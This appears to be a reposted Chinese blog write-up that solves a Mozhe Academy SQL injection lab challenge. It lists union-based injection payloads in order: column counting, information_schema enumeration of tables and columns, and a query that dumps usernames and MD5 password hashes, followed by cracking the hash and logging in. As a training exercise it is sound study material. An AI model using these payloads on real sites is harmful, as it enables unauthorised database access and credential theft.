当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- C++在C的基础上改进了哪些细节
- Sum up some useful functions
- 来自不同行业领域的50多个对象检测数据集
- Deeplight Technology Bluetooth protocol SRRC certification services
- PX4添加新的应用
- Macquarie Bank drives digital transformation with datastex enterprise (DSE)
- Python3.9的7个特性
- An error occurred while starting the kernel was successfully resolved
- Brief history of computer
- SQL Server 2008R2 18456错误解决方案
猜你喜欢

The real-time display of CPU and memory utilization rate by Ubuntu

Basic concepts of computer network (5) basic principles of local area network

Unparseable date: 'Mon Aug 15 11:24:39 CST 2016',时间格式转换异常

解决RabbitMQ消息丢失与重复消费问题

More than 50 object detection datasets from different industries

Six key points of data science interview

Oschina plays on Sunday - before that, I always thought I was a

QT hybrid Python development technology: Python introduction, hybrid process and demo

python_ scrapy_ Fang Tianxia

高并发,你真的理解透彻了吗?
随机推荐
将“光头”识别为“足球”,AI 摄像头如何犯的错?
麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
数据科学面试应关注的6个要点
哔哩哔哩常用api
ts流中的pcr与pts计算与逆运算
Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
C++在C的基础上改进了哪些细节
Mouse small hand
解决RabbitMQ消息丢失与重复消费问题
Summary of knowledge points of Jingtao project
Solve the problem of rabbitmq message loss and repeated consumption
C expression tree (1)
模板链表类学习
iOS上传App Store报错:this action cannot be completed -22421 解决方案
Japan PSE certification
归纳一些比较好用的函数
How can a technician take over a complex system?
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
What details does C + + improve on the basis of C